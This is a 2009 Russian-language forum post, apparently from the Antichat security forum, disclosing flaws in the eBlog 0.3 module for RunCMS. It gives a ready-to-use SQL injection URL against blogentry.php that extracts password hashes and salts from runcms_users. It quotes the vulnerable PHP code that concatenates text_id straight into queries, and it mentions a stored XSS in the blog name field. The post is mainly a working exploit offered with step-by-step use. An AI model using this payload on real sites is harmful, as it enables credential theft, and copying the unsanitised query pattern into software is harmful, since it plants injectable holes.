23.02.2009, 11:22
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
eBlog
Версия: 0.3
Заходим, создаем свой блог, добавляем запись ..
Уязвимый скрипт: blogentry.php
Запрос: blogentry.php?op=edit&text_id=-1+union+select+ 1,pass,pwdsalt,4+from+runcms_users+limit+0,1
Где выделенная еденица - айди вашего блога
Уязвимый кусок кода:
PHP код:
if ($op == 'edit')
{
list($b_id, $title, $txt, $dt) = $db->fetch_row($db->query("select text_blogid, text_title, text_text, text_date from ".
$db->prefix("eblog_text")." where text_id=$text_id"));
if (!isSet($b_id) || $b_id != $blog_id)
{
echo $blog_id;
return;
}
if (!isSet($cats))
{
$result = $db->query("select tc_catid from ".$db->prefix("eblog_text_cat")." where tc_textid=$text_id");
$cats = array();
while ($myrow = $db->fetch_array($result)) { $cats += array($myrow['tc_catid']); }
}
eBlogMenu(array("index.php?blog_id=1" => _EBLOG_MY_BLOG,
"blogentry.php?op=add" => _EBLOG_ADD_ENTRY,
"blogadmin.php?op=edit" => _EBLOG_ADMIN,
"index.php?blog_id=-1" => _EBLOG_CHOOSE_BLOG,
"index.php" => _EBLOG_ALL_LATEST
)
);
showForm(_EBLOG_EDIT_ENTRY, $title, $txt, $all_cats, $cats, $text_id, "");
return;
}
Активная XSS
Уязвимо поле имя блога
|
|
|